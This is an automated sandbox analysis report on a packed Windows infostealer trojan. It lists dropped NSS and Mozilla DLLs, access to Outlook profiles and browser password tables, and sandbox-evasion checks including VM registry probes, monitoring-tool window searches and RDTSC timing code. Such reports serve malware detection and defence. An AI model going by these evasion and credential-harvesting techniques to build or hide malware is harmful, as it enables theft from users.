Source: file.exe, 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.1939959900.0000000029856000.00000004.00000020.00020000.00000000.sdmp, JKEBFBFIEHIDAAAAFHCFCGIECB.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: JKEBFBFIEHIDAAAAFHCFCGIECB.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1939959900.0000000029856000.00000004.00000020.00020000.00000000.sdmp, JKEBFBFIEHIDAAAAFHCFCGIECB.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707036	0_2_00707036
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D21DB	0_2_009D21DB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0060412D	0_2_0060412D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0070D91F	0_2_0070D91F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006929B9	0_2_006929B9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00708A77	0_2_00708A77
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F7A77	0_2_005F7A77
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00617AE4	0_2_00617AE4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00703AF7	0_2_00703AF7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00712AEA	0_2_00712AEA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00653411	0_2_00653411
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00696CD4	0_2_00696CD4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0070F49F	0_2_0070F49F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0070A552	0_2_0070A552
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0070551C	0_2_0070551C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00634E07	0_2_00634E07
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00710FE7	0_2_00710FE7

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 003445C0 appears 316 times

Source: file.exe, 00000000.00000002.2015331269.000000006F902000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2015144574.000000006C865000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: qrqcuroh ZLIB complexity 0.9951864726681957

Source: file.exe, 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1764315885.0000000004F30000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/22@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00359600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00359600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00353720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00353720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\DOBV6FAT.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2014655422.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2015010802.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2005739607.000000001D671000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2014655422.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2015010802.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2005739607.000000001D671000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2014655422.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2015010802.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2005739607.000000001D671000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2014655422.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2015010802.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2005739607.000000001D671000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.2014655422.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2015010802.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2005739607.000000001D671000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2014655422.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2005739607.000000001D671000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2014655422.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2015010802.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2005739607.000000001D671000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1845979163.000000001D574000.00000004.00000020.00020000.00000000.sdmp, AECAKJJECAEGCBGDHDHC.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2014655422.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2005739607.000000001D671000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2014655422.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2005739607.000000001D671000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 50%

Source: file.exe	String found in binary or memory: ft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d
Source: file.exe	String found in binary or memory: m/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?
Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1830912 > 1048576

Source: file.exe

Static PE information: Raw size of qrqcuroh is bigger than: 0x100000 < 0x198c00

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2015257049.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2015010802.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2015010802.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2015257049.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.340000.0.unpack :EW;.rsrc :W;.idata :W; :EW;qrqcuroh:EW;ofoequcp:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;qrqcuroh:EW;ofoequcp:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00359860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00359860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1c6828 should be: 0x1c41c4

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: qrqcuroh
Source: file.exe	Static PE information: section name: ofoequcp
Source: file.exe	Static PE information: section name: .taggant
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0035B035 push ecx; ret	0_2_0035B048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008028A2 push 4A365EE3h; mov dword ptr [esp], ecx	0_2_00802923
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00745850 push edx; mov dword ptr [esp], 79B5B347h	0_2_00745884
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00745850 push ebp; mov dword ptr [esp], esi	0_2_007458D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006A5840 push 2F1D1B00h; mov dword ptr [esp], eax	0_2_006A592E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006A5840 push edi; mov dword ptr [esp], esi	0_2_006A5A08
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707036 push 654E4B4Ch; mov dword ptr [esp], esi	0_2_00707047
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707036 push 197EE0BAh; mov dword ptr [esp], eax	0_2_00707054
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707036 push 7305FFE4h; mov dword ptr [esp], ecx	0_2_0070709A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707036 push 67E3419Fh; mov dword ptr [esp], ebx	0_2_0070721A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707036 push edi; mov dword ptr [esp], ecx	0_2_00707224
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707036 push 333A4100h; mov dword ptr [esp], esi	0_2_0070723E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707036 push esi; mov dword ptr [esp], edx	0_2_007072AA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707036 push ebx; mov dword ptr [esp], 318915FDh	0_2_007072E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707036 push ecx; mov dword ptr [esp], esi	0_2_007072EC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707036 push ebx; mov dword ptr [esp], ecx	0_2_0070730B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707036 push 6B0BD141h; mov dword ptr [esp], edi	0_2_0070740A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707036 push esi; mov dword ptr [esp], ebx	0_2_0070741F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707036 push 0CFB6B12h; mov dword ptr [esp], edx	0_2_00707474
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707036 push ebp; mov dword ptr [esp], ecx	0_2_007074A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707036 push 56FA6867h; mov dword ptr [esp], ebx	0_2_007074A9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707036 push 702A2D45h; mov dword ptr [esp], esp	0_2_00707503
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707036 push 2985A55Fh; mov dword ptr [esp], ebx	0_2_007075F2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707036 push 3E2A7896h; mov dword ptr [esp], eax	0_2_007076AE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707036 push ebp; mov dword ptr [esp], ecx	0_2_007076D2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707036 push edx; mov dword ptr [esp], esi	0_2_0070772A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707036 push 5FDE90C9h; mov dword ptr [esp], ebp	0_2_007077B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707036 push 1B2763F2h; mov dword ptr [esp], eax	0_2_007077D9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707036 push ecx; mov dword ptr [esp], edx	0_2_00707858
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707036 push 37282A2Eh; mov dword ptr [esp], ebp	0_2_00707886
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707036 push 2F4479C9h; mov dword ptr [esp], edi	0_2_007078D4

Source: file.exe

Static PE information: section name: qrqcuroh entropy: 7.954103653364646

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_00359860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-13251

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 717761 second address: 717767 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 717767 second address: 71777E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9498E4A782h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7168DE second address: 7168E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71967E second address: 7196D9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9498E4A783h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 25DBED72h 0x00000011 mov dword ptr [ebp+122D1917h], ecx 0x00000017 lea ebx, dword ptr [ebp+1244B432h] 0x0000001d xor dword ptr [ebp+122D2A6Dh], edi 0x00000023 mov dword ptr [ebp+122D1FF4h], edi 0x00000029 xchg eax, ebx 0x0000002a push esi 0x0000002b js 00007F9498E4A788h 0x00000031 pop esi 0x00000032 push eax 0x00000033 jnl 00007F9498E4A78Dh 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 719788 second address: 71978C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71978C second address: 7197AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9498E4A785h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7197AB second address: 7197CB instructions: 0x00000000 rdtsc 0x00000002 jp 00007F94990FE56Ch 0x00000008 jnc 00007F94990FE566h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jbe 00007F94990FE566h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7197CB second address: 71989A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9498E4A782h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F9498E4A784h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 ja 00007F9498E4A78Fh 0x0000001a pop eax 0x0000001b movsx edi, cx 0x0000001e push 00000003h 0x00000020 push edx 0x00000021 or ecx, 6FE94948h 0x00000027 pop esi 0x00000028 mov esi, edx 0x0000002a push 00000000h 0x0000002c or si, 538Fh 0x00000031 push 00000003h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007F9498E4A778h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 0000001Bh 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d call 00007F9498E4A780h 0x00000052 pushad 0x00000053 pushad 0x00000054 popad 0x00000055 mov cx, di 0x00000058 popad 0x00000059 pop esi 0x0000005a jmp 00007F9498E4A789h 0x0000005f call 00007F9498E4A779h 0x00000064 push eax 0x00000065 push edx 0x00000066 ja 00007F9498E4A778h 0x0000006c rdtsc
